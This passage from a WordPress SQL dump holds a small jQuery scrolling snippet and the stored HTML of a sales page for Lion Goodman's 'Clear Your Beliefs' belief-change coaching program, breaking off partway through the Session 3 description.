<![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1891, 2172, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71342:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	